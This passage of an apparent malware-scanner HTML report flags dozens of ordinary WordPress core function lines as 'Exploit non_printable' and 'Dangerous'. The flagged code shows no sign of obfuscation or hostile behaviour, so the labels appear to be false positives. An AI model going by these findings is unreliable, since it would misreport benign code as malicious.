<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the current timestamp </span><span style="color: #007700">or </span><span style="color: #0000BB">a sum of timestamp</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_main_site</span><span style="color: #007700">( </span><span style="color: #0000BB">$site_id </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$network_id </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6411</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">get_main_site_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$network_id </span><span style="color: #007700">) === </span><span style="color: #0000BB">$site_id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int The ID of the main site</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_main_site_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$network_id </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">get_current_blog_id</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6433</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$network</span><span style="color: #007700">-></span><span style="color: #0000BB">site_id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">$network_id is the main network</span><span style="color: #007700">, or if </span><span style="color: #0000BB">not running Multisite</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_main_network</span><span style="color: #007700">( </span><span style="color: #0000BB">$network_id </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( </span><span style="color: #0000BB">get_main_network_id</span><span style="color: #007700">() === </span><span style="color: #0000BB">$network_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int The ID of the main network</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_main_network_id</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (int) </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_main_network_id'</span><span style="color: #007700">, </span><span style="color: #0000BB">$main_network_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6500</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">checks whether the </span><span style="color: #DD0000">'blogmeta' </span><span style="color: #0000BB">database table exists</span><span style="color: #007700">. </span><span style="color: #0000BB">The result is saved </span><span style="color: #007700">as</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">site meta is supported</span><span style="color: #007700">, </span><span style="color: #0000BB">false otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_site_meta_supported</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">$supported</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed Unserialized data can be any type</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6536</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float</span><span style="color: #007700">|</span><span style="color: #0000BB">false Timezone GMT offset</span><span style="color: #007700">, </span><span style="color: #0000BB">false otherwise</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_timezone_override_offset</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 654</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">maybe_unserialize</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">( </span><span style="color: #0000BB">timezone_offset_get</span><span style="color: #007700">( </span><span style="color: #0000BB">$timezone_object</span><span style="color: #007700">, </span><span style="color: #0000BB">$datetime_object </span><span style="color: #007700">) / </span><span style="color: #0000BB">HOUR_IN_SECONDS</span><span style="color: #007700">, </span><span style="color: #0000BB">2 </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_timezone_choice_usort_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return -</span><span style="color: #0000BB">1 </span><span style="color: #007700">* ( </span><span style="color: #0000BB">strnatcasecmp</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'city'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'city'</span><span style="color: #007700">] ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 656</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">unserialize</span><span style="color: #007700">( </span><span style="color: #0000BB">trim</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return -</span><span style="color: #0000BB">1</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6587</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strnatcasecmp</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'city'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'city'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strnatcasecmp</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_subcity'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_subcity'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6595</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strnatcasecmp</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_city'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_city'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strnatcasecmp</span><span style="color: #007700">( </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_continent'</span><span style="color: #007700">], </span><span style="color: #0000BB">$b</span><span style="color: #007700">[</span><span style="color: #DD0000">'t_continent'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6620</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_timezone_choice</span><span style="color: #007700">( </span><span style="color: #0000BB">$selected_zone</span><span style="color: #007700">, </span><span style="color: #0000BB">$locale </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6653</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function,</span><span style="color: #0000BB">WordPress</span><span style="color: #007700">.</span><span style="color: #0000BB">WP</span><span style="color: #007700">.</span><span style="color: #0000BB">I18n</span><span style="color: #007700">.</span><span style="color: #0000BB">NonSingularStringLiteralText</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 665</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned value will always be false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 673</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool False </span><span style="color: #007700">if </span><span style="color: #0000BB">not serialized </span><span style="color: #007700">and </span><span style="color: #0000BB">true </span><span style="color: #007700">if </span><span style="color: #0000BB">it was</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_serialized</span><span style="color: #007700">( </span><span style="color: #0000BB">$data</span><span style="color: #007700">, </span><span style="color: #0000BB">$strict </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$structure </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6822</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_cleanup_header_comment</span><span style="color: #007700">( </span><span style="color: #0000BB">$str </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6823</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">( </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">( </span><span style="color: #DD0000">'/\s*(?:\*\/|\?>).*/'</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6836</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_scheduled_delete</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] Array </span><span style="color: #0000BB">of file header values keyed by header name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_file_data</span><span style="color: #007700">( </span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$default_headers</span><span style="color: #007700">, </span><span style="color: #0000BB">$context </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6935</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_headers</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning true to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_false</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true True</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6949</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_true</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning false to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false False</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__return_false</span><span style="color: #007700">() { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.FunctionDoubleUnderscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns 0.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning 0 to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int 0.</span>
</span>
